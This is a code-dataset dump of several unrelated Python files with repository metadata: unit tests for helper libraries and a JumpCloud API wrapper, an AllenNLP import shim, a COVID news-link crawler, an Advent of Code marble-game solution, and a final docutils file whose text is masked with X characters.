| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3af69acfc20c476a8d19b9ab5edbc1c708c9fb3f
| 40
|
py
|
Python
|
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
def test_import():
import pyislands
| 13.333333
| 20
| 0.725
| 5
| 40
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 21
| 20
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aaf4166637d18349fdba991f2bc8623269a574c9
| 8,324
|
py
|
Python
|
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | null | null | null |
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | 23
|
2020-08-15T00:41:17.000Z
|
2022-03-30T12:03:08.000Z
|
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import uuid
import domain_model
from domain_model import DomainModel
from domain_model import DomainModelWithUuid
from misc_test_utils import copy_dict_with_key_removed
from misc_test_utils import domain_model_validate_internals_test
from misc_test_utils import domain_model_validation_test
from misc_test_utils import misc_test_utils
import pytest
def test_copy_dict_with_key_removed__creates_copy_of_dict():
    """The helper returns an equal dict that is a distinct object."""
    test_dict = {"key1": 1, "key2": 2}
    actual = copy_dict_with_key_removed(test_dict)
    assert actual == test_dict
    assert actual is not test_dict
def test_copy_dict_with_key_removed__removes_key_if_specified():
    """Passing ``key_to_remove`` drops exactly that key from the copy."""
    test_dict = {"key1": 1, "key2": 2}
    actual = copy_dict_with_key_removed(test_dict, key_to_remove="key2")
    assert actual == {"key1": 1}
def test_domain_model_validation_test__creates_DomainModel_object(mocker):
    """The harness instantiates the model class it is given."""
    mocked_init = mocker.patch.object(
        domain_model.DomainModel, "__init__", autospec=True, return_value=None
    )
    domain_model_validation_test(DomainModel)
    mocked_init.assert_called_once()
def test_domain_model_validation_test__calls_validate_with_no_expected_error(mocker):
    """``validate`` is invoked exactly once when no error is expected."""
    mocked_validate = mocker.patch.object(
        domain_model.DomainModelWithUuid, "validate", autospec=True
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validation_test(DomainModelWithUuid, "uuid", test_uuid)
    mocked_validate.assert_called_once()
def test_domain_model_validation_test__calls_validate_with_no_expected_error__and_uuid_passed_as_additional_kwarg(
    mocker,
):
    """``validate`` is invoked once when the uuid arrives via ``additional_kwargs``."""
    mocked_validate = mocker.patch.object(
        domain_model.DomainModelWithUuid, "validate", autospec=True
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validation_test(
        DomainModelWithUuid, additional_kwargs={"uuid": test_uuid}
    )
    mocked_validate.assert_called_once()
def test_domain_model_validation_test__catches_error(mocker):
    """An ``expected_error`` raised by ``validate`` is caught via ``pytest.raises``."""
    spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
    expected_error = ValueError()
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validation_test(
        DomainModelWithUuid, "uuid", test_uuid, expected_error=ValueError
    )
    spied_raises.assert_called_once()
def test_domain_model_validation_test__catches_error_with_text(mocker):
    """A matching ``expected_texts_in_error`` still routes through ``pytest.raises``."""
    spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
    expected_text = "test"
    expected_error = ValueError(expected_text)
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validation_test(
        DomainModelWithUuid,
        "uuid",
        test_uuid,
        expected_error=ValueError,
        expected_texts_in_error=expected_text,
    )
    spied_raises.assert_called_once()
def test_domain_model_validation_test__raises_assertion_error_if_single_expected_text_is_not_in_expected_error(
    mocker,
):
    """A missing expected text makes the harness fail with ``AssertionError``."""
    expected_text = "test"
    expected_error = ValueError()
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    with pytest.raises(AssertionError):
        domain_model_validation_test(
            DomainModelWithUuid,
            "uuid",
            test_uuid,
            expected_error=ValueError,
            expected_texts_in_error=expected_text,
        )
def test_domain_model_validation_test__raises_assertion_error_if_one_of_multiple_expected_texts_not_in_expected_error(
    mocker,
):
    """If any one of several expected texts is absent the harness raises."""
    expected_texts = ["test1", "test2"]
    expected_error = ValueError("test1")
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    with pytest.raises(AssertionError):
        domain_model_validation_test(
            DomainModelWithUuid,
            "uuid",
            test_uuid,
            expected_error=ValueError,
            expected_texts_in_error=expected_texts,
        )
def test_domain_model_validate_internals_test__creates_DomainModel_object(mocker):
    """The internals harness instantiates the model class it is given."""
    mocked_init = mocker.patch.object(
        domain_model.DomainModel, "__init__", autospec=True, return_value=None
    )
    domain_model_validate_internals_test(DomainModel)
    mocked_init.assert_called_once()
def test_domain_model_validate_internals_test__calls_validate_with_no_expected_error(
    mocker,
):
    """``validate_internals`` is invoked once when no error is expected."""
    mocked_validate = mocker.patch.object(
        domain_model.DomainModelWithUuid, "validate_internals", autospec=True
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validate_internals_test(DomainModelWithUuid, "uuid", test_uuid)
    mocked_validate.assert_called_once()
def test_domain_model_validate_internals_test__calls_validate_with_no_expected_error__and_uuid_passed_as_additional_kwarg(
    mocker,
):
    """``validate_internals`` runs once when the uuid comes via ``additional_kwargs``."""
    mocked_validate = mocker.patch.object(
        domain_model.DomainModelWithUuid, "validate_internals", autospec=True
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validate_internals_test(
        DomainModelWithUuid, additional_kwargs={"uuid": test_uuid}
    )
    mocked_validate.assert_called_once()
def test_domain_model_validate_internals_test__catches_error(mocker):
    """An expected error from ``validate_internals`` is caught via ``pytest.raises``."""
    spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
    expected_error = ValueError()
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate_internals",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validate_internals_test(
        DomainModelWithUuid, "uuid", test_uuid, expected_error=ValueError
    )
    spied_raises.assert_called_once()
def test_domain_model_validate_internals_test__catches_error_with_text(mocker):
    """A matching expected text still routes through ``pytest.raises``."""
    spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
    expected_text = "test"
    expected_error = ValueError(expected_text)
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate_internals",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    domain_model_validate_internals_test(
        DomainModelWithUuid,
        "uuid",
        test_uuid,
        expected_error=ValueError,
        expected_texts_in_error=expected_text,
    )
    spied_raises.assert_called_once()
def test_domain_model_validate_internals_test__raises_assertion_error_if_single_expected_text_is_not_in_expected_error(
    mocker,
):
    """A missing expected text makes the internals harness raise ``AssertionError``."""
    expected_text = "test"
    expected_error = ValueError()
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate_internals",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    with pytest.raises(AssertionError):
        domain_model_validate_internals_test(
            DomainModelWithUuid,
            "uuid",
            test_uuid,
            expected_error=ValueError,
            expected_texts_in_error=expected_text,
        )
def test_domain_model_validate_internals_test__raises_assertion_error_if_one_of_multiple_expected_texts_not_in_expected_error(
    mocker,
):
    """If any one of several expected texts is absent the harness raises."""
    expected_texts = ["test1", "test2"]
    expected_error = ValueError("test1")
    mocker.patch.object(
        domain_model.DomainModelWithUuid,
        "validate_internals",
        autospec=True,
        side_effect=expected_error,
    )
    test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
    with pytest.raises(AssertionError):
        domain_model_validate_internals_test(
            DomainModelWithUuid,
            "uuid",
            test_uuid,
            expected_error=ValueError,
            expected_texts_in_error=expected_texts,
        )
| 33.429719
| 126
| 0.735704
| 953
| 8,324
| 5.943337
| 0.086044
| 0.091278
| 0.064972
| 0.074153
| 0.952507
| 0.938559
| 0.928143
| 0.899718
| 0.899718
| 0.899718
| 0
| 0.038104
| 0.186569
| 8,324
| 248
| 127
| 33.564516
| 0.798405
| 0.002523
| 0
| 0.728972
| 0
| 0
| 0.089869
| 0.052042
| 0
| 0
| 0
| 0
| 0.098131
| 1
| 0.074766
| false
| 0.009346
| 0.042056
| 0
| 0.116822
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c923ca4bb935bd96e10f420bc13c389130821a98
| 164
|
py
|
Python
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 22
|
2020-03-28T10:28:26.000Z
|
2022-02-17T12:31:17.000Z
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 14
|
2020-03-21T17:04:40.000Z
|
2021-09-27T10:11:19.000Z
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 4
|
2020-04-18T10:33:34.000Z
|
2021-02-02T11:57:28.000Z
|
import allennlp
# Version shim: pick the CLI entry point by installed AllenNLP major version
# so callers can always do ``from ... import allennlp_run``.
# NOTE(review): ``allennlp.version._MAJOR`` is a private attribute — confirm
# it still exists on the versions this project supports.
if int(allennlp.version._MAJOR) >= 1:
    from allennlp.__main__ import run as allennlp_run
else:
    from allennlp.run import run as allennlp_run
| 23.428571
| 53
| 0.768293
| 25
| 164
| 4.76
| 0.48
| 0.277311
| 0.184874
| 0.319328
| 0.369748
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007353
| 0.170732
| 164
| 6
| 54
| 27.333333
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6e5cc99026b3a3933c01856815ccfff6104b13d0
| 2,943
|
py
|
Python
|
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
from . import util
import random
class URLCrawlerBaomoi:
    """Crawl article URLs starting from baomoi.com covid topic pages.

    Yields ``(source_url, found_href)`` pairs from :meth:`crawl`.
    """

    def __init__(self):
        # BUGFIX: these were class-level lists, so state was shared between
        # every instance of the class; they are now per-instance.
        self.done = []        # URLs already fully crawled
        self.queue = []       # URLs discovered but not yet crawled
        self.start_urls = []  # seed listing pages
        self.set_start_urls()
        self.browser = util.Browser()

    def set_start_urls(self):
        """Seed the queue with the baomoi covid topic listing page(s)."""
        # NOTE(review): range(1, 2) covers only page 1 — confirm whether
        # additional pages were intended.
        for i in range(1, 2):
            url = 'https://baomoi.com/phong-chong-dich-covid-19/top/328/trang{}.epi'.format(i)
            self.start_urls.append(url)
            self.queue.append(url)

    def crawl(self):
        """Yield (url, href) pairs from the seed pages, then the queue."""
        yield from self.crawl_start_urls_child()
        yield from self.crawl_child()

    def crawl_start_urls_child(self):
        """Yield links found on the seed pages, enqueueing new ones."""
        for url in self.start_urls:
            for href in util.get_href(self.browser, url):
                if href not in self.done and href not in self.queue:
                    self.queue.append(href)
                    yield url, href

    def crawl_child(self):
        """Drain the queue (in random order), yielding newly found links."""
        # BUGFIX: the original ``while 1`` raised IndexError from pop(0)
        # once the queue emptied; terminate cleanly instead.
        while self.queue:
            # shuffle the queue to get more diverse content, since the
            # first batch of links all come from the baomoi front pages
            random.shuffle(self.queue)
            url = self.queue.pop(0)
            for href in util.get_href(self.browser, url, keyword='covid'):
                if href not in self.done and href not in self.queue:
                    self.queue.append(href)
                    yield url, href
            self.done.append(url)
class URLCrawlerNcov:
    """Crawl article URLs starting from the MoH ncov timeline page.

    Yields ``(source_url, found_href)`` pairs from :meth:`crawl`.
    """

    def __init__(self):
        # BUGFIX: these were class-level lists, so state was shared between
        # every instance of the class; they are now per-instance.
        self.done = []        # URLs already fully crawled
        self.queue = []       # URLs discovered but not yet crawled
        self.start_urls = []  # seed listing pages
        self.set_start_urls()
        self.browser = util.Browser()

    def set_start_urls(self):
        """Seed the crawl with the single ncov.moh.gov.vn timeline page."""
        # BUGFIX: the original appended the url to start_urls twice (and ran
        # a one-iteration loop), making crawl_start_urls_child() fetch the
        # same seed page twice.
        url = 'https://ncov.moh.gov.vn/dong-thoi-gian'
        self.start_urls.append(url)
        self.queue.append(url)

    def crawl(self):
        """Yield (url, href) pairs from the seed page, then the queue."""
        yield from self.crawl_start_urls_child()
        yield from self.crawl_child()

    def crawl_start_urls_child(self):
        """Yield links found on the seed pages, enqueueing new ones."""
        for url in self.start_urls:
            for href in util.get_href(self.browser, url):
                if href not in self.done and href not in self.queue:
                    self.queue.append(href)
                    yield url, href

    def crawl_child(self):
        """Drain the queue (in random order), yielding newly found links."""
        # BUGFIX: the original ``while 1`` raised IndexError from pop(0)
        # once the queue emptied; terminate cleanly instead.
        while self.queue:
            # shuffle the queue to get more diverse content
            random.shuffle(self.queue)
            url = self.queue.pop(0)
            for href in util.get_href(self.browser, url, keyword='covid'):
                if href not in self.done and href not in self.queue:
                    self.queue.append(href)
                    yield url, href
            self.done.append(url)
| 30.030612
| 94
| 0.526673
| 372
| 2,943
| 4.02957
| 0.19086
| 0.09006
| 0.048032
| 0.058706
| 0.905937
| 0.897265
| 0.897265
| 0.897265
| 0.897265
| 0.8499
| 0
| 0.010532
| 0.38702
| 2,943
| 97
| 95
| 30.340206
| 0.820399
| 0.090724
| 0
| 0.915493
| 0
| 0.014085
| 0.042011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140845
| false
| 0
| 0.028169
| 0
| 0.28169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e8e96a15717abdceb21d12b5e7170ef234fdfb0
| 5,343
|
py
|
Python
|
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | 1
|
2020-05-13T18:52:06.000Z
|
2020-05-13T18:52:06.000Z
|
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. currentmodule:: test_jc_api_v1
.. moduleauthor:: zaro0508 <zaro0508@gmail.com>
This is the test module for the project's JC API V1 module.
"""
# fmt: off
import pytest
import jcapiv1
# fmt: on
from mock import MagicMock, patch, sentinel
from jccli.jc_api_v1 import JumpcloudApiV1
from jccli.errors import SystemUserNotFoundError
class TestJcApiV1:
    """Unit tests for ``jccli.jc_api_v1.JumpcloudApiV1`` user operations."""

    def setup_method(self, test_method):
        """Per-test setup hook (nothing to set up currently)."""
        pass

    def teardown_method(self, test_method):
        """Per-test teardown hook (nothing to tear down currently)."""
        pass

    @staticmethod
    def _systemuser_response(attributes):
        """Return a canned JumpCloud v1 systemusers listing with one user.

        The record was previously duplicated verbatim (~45 lines) in two
        tests; only ``attributes`` differed, so it is now a parameter.
        """
        return [
            {'account_locked': False,
             'activated': False,
             'addresses': [],
             'allow_public_key': True,
             'attributes': attributes,
             'bad_login_attempts': 0,
             'company': None,
             'cost_center': None,
             'created': '2019-11-05T01:42:36.652Z',
             'department': None,
             'description': None,
             'displayname': None,
             'email': 'jc.tester1@sagebase.org',
             'employee_identifier': None,
             'employee_type': None,
             'enable_managed_uid': False,
             'enable_user_portal_multifactor': False,
             'external_dn': None,
             'external_source_type': None,
             'externally_managed': False,
             'firstname': 'JC',
             '_id': '5dc0d38c1e2e5f51f2312948',
             'job_title': None,
             'lastname': 'Tester1',
             'ldap_binding_user': False,
             'location': None,
             'mfa': {'configured': False, 'exclusion': False, 'exclusion_until': None},
             'middlename': None,
             'organization': '5a9d7329feb7f81004ecbee4',
             'password_expiration_date': None,
             'password_expired': False,
             'password_never_expires': False,
             'passwordless_sudo': False,
             'phone_numbers': [],
             'public_key': None,
             'relationships': [],
             'samba_service_user': False,
             'ssh_keys': [],
             'sudo': False,
             'tags': None,
             'totp_enabled': False,
             'unix_guid': 5109,
             'unix_uid': 5109,
             '_username': 'jctester1'}
        ]

    @patch.object(JumpcloudApiV1, 'get_users')
    def test_get_user_id(self, mock_get_users):
        """A known username resolves to the record's ``_id``."""
        mock_get_users.return_value = self._systemuser_response(
            [{'name': 'nick', 'value': 'jcman'}]
        )
        api1 = JumpcloudApiV1("1234")
        user_id = api1.get_user_id("jctester1")
        assert user_id == "5dc0d38c1e2e5f51f2312948", "Failed to get the user ID"

    @patch.object(JumpcloudApiV1, 'get_users')
    def test_get_user_id_not_found(self, mock_get_users):
        """An unknown username resolves to ``None``."""
        mock_get_users.return_value = self._systemuser_response([])
        api1 = JumpcloudApiV1("1234")
        user_id = api1.get_user_id("foo")
        # BUGFIX(idiom): use ``is None`` rather than ``== None``.
        assert user_id is None, "User ID should be none"

    @patch.object(jcapiv1.SystemusersApi, 'systemusers_delete')
    @patch.object(JumpcloudApiV1, 'get_user_id')
    def test_delete_user(self, mock_get_user_id, mock_systemusers_delete):
        """delete_user completes without error when the user id resolves."""
        mock_get_user_id.return_value = "1234"
        api1 = JumpcloudApiV1("1234")
        api1.delete_user("foo")

    @patch.object(jcapiv1.SystemusersApi, 'systemusers_delete')
    @patch.object(JumpcloudApiV1, 'get_user_id')
    def test_delete_user_no_id(self, mock_get_user_id, mock_systemusers_delete):
        """delete_user raises SystemUserNotFoundError when lookup yields None."""
        mock_get_user_id.return_value = None
        api1 = JumpcloudApiV1("1234")
        with pytest.raises(SystemUserNotFoundError):
            api1.delete_user("foo")
| 35.151316
| 87
| 0.551001
| 503
| 5,343
| 5.568588
| 0.308151
| 0.034273
| 0.032131
| 0.039986
| 0.794716
| 0.777579
| 0.777579
| 0.777579
| 0.777579
| 0.777579
| 0
| 0.051782
| 0.327719
| 5,343
| 151
| 88
| 35.384106
| 0.728007
| 0.037806
| 0
| 0.80916
| 0
| 0
| 0.304678
| 0.071345
| 0
| 0
| 0
| 0
| 0.015267
| 1
| 0.045802
| false
| 0.076336
| 0.038168
| 0
| 0.091603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6e97500709dbab16fb378ce004ba82cf90635cf4
| 3,625
|
py
|
Python
|
2018/day_09/python/day09.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
2018/day_09/python/day09.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | 2
|
2021-06-02T00:41:38.000Z
|
2021-11-30T10:05:29.000Z
|
2018/day_09/python/day09.py
|
autoreleasefool/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
from aoc import AOC
from collections import defaultdict
# Advent of Code 2018, day 9: the marble game ("marble mania").
aoc = AOC(year=2018, day=9)
data = aoc.load()
## Part 1
class Marble:
    """A node in a circular doubly linked list of marbles."""

    def __init__(self, value):
        self.value = value
        # Neighbour links; set by the caller when inserting into the circle.
        self.clockwise = None
        self.counterclockwise = None

    def __repr__(self):
        cw = self.clockwise.value
        ccw = self.counterclockwise.value
        return "{}, ({}, {})".format(self.value, cw, ccw)
def remove_marble(marble):
    """Unlink the marble 7 steps counterclockwise of *marble*.

    Returns ``(removed, successor)`` where *successor* is the marble that
    was clockwise of the removed one.
    """
    target = marble
    for _ in range(7):
        target = target.counterclockwise
    before = target.counterclockwise
    # Splice the circle shut around the removed node.
    target.clockwise.counterclockwise = before
    before.clockwise = target.clockwise
    return target, target.clockwise
players, last_marble_points = data.numbers_by_line()[0]
player_points = defaultdict(int)  # player index -> accumulated score
current_player = 0
highest_marble_placed = 0
# Start with marble 0 forming a one-element circle (links point to itself).
current_marble = Marble(0)
current_marble.clockwise = current_marble
current_marble.counterclockwise = current_marble
marbles = {0: current_marble}
while highest_marble_placed < last_marble_points:
    marble_to_place = Marble(highest_marble_placed + 1)
    if marble_to_place.value % 23 == 0:
        # Scoring turn: keep the new marble, remove the one 7 steps
        # counterclockwise, and score both for the current player.
        player_points[current_player] += marble_to_place.value
        removed_marble, next_marble = remove_marble(current_marble)
        player_points[current_player] += removed_marble.value
        current_marble = next_marble
    else:
        # Normal turn: insert the new marble between the marbles one and
        # two positions clockwise of the current marble.
        marbles[marble_to_place.value] = marble_to_place
        marble_to_place.clockwise = current_marble.clockwise.clockwise
        marble_to_place.counterclockwise = current_marble.clockwise
        current_marble.clockwise.clockwise.counterclockwise = marble_to_place
        current_marble.clockwise.clockwise = marble_to_place
        current_marble = marble_to_place
    current_player = (current_player + 1) % players
    highest_marble_placed += 1
aoc.p1(max(player_points.values()))
## Part 2
class Marble:
    """A node in a circular doubly linked list of marbles (part 2 copy)."""

    def __init__(self, value):
        self.value = value
        # Neighbour links; set by the caller when inserting into the circle.
        self.clockwise = None
        self.counterclockwise = None

    def __repr__(self):
        cw = self.clockwise.value
        ccw = self.counterclockwise.value
        return "{}, ({}, {})".format(self.value, cw, ccw)
def remove_marble(marble):
    """Unlink the marble 7 steps counterclockwise of *marble* (part 2 copy).

    Returns ``(removed, successor)`` where *successor* was clockwise of
    the removed marble.
    """
    target = marble
    for _ in range(7):
        target = target.counterclockwise
    before = target.counterclockwise
    # Splice the circle shut around the removed node.
    target.clockwise.counterclockwise = before
    before.clockwise = target.clockwise
    return target, target.clockwise
players, last_marble_points = data.numbers_by_line()[0]
last_marble_points = last_marble_points * 100  # part 2: 100x more marbles
player_points = defaultdict(int)  # player index -> accumulated score
current_player = 0
highest_marble_placed = 0
# Start with marble 0 forming a one-element circle (links point to itself).
current_marble = Marble(0)
current_marble.clockwise = current_marble
current_marble.counterclockwise = current_marble
while highest_marble_placed < last_marble_points:
    marble_to_place = Marble(highest_marble_placed + 1)
    if marble_to_place.value % 23 == 0:
        # Scoring turn: keep the new marble, remove the one 7 steps
        # counterclockwise, and score both for the current player.
        player_points[current_player] += marble_to_place.value
        removed_marble, next_marble = remove_marble(current_marble)
        player_points[current_player] += removed_marble.value
        current_marble = next_marble
    else:
        # Normal turn: insert the new marble between the marbles one and
        # two positions clockwise of the current marble.
        marble_to_place.clockwise = current_marble.clockwise.clockwise
        marble_to_place.counterclockwise = current_marble.clockwise
        current_marble.clockwise.clockwise.counterclockwise = marble_to_place
        current_marble.clockwise.clockwise = marble_to_place
        current_marble = marble_to_place
    current_player = (current_player + 1) % players
    highest_marble_placed += 1
aoc.p2(max(player_points.values()))
| 30.208333
| 77
| 0.731034
| 422
| 3,625
| 5.945498
| 0.135071
| 0.129534
| 0.093264
| 0.074133
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0
| 0.011921
| 0.190069
| 3,625
| 119
| 78
| 30.462185
| 0.842643
| 0.003586
| 0
| 0.873563
| 0
| 0
| 0.006654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.022989
| 0.022989
| 0.16092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42dd51dd201e9ad841926ba555c96e43c365fba3
| 2,880
|
py
|
Python
|
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
XX XXXX XXXX XXXX XXX XXXX XXXXXX XX XXX XXXXXX XXXXXXX
XX XXXXXXX XXXX XXX XXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXX XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX XX XXXXXXXXXXXXXXXXXXX XXXX XX XXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX
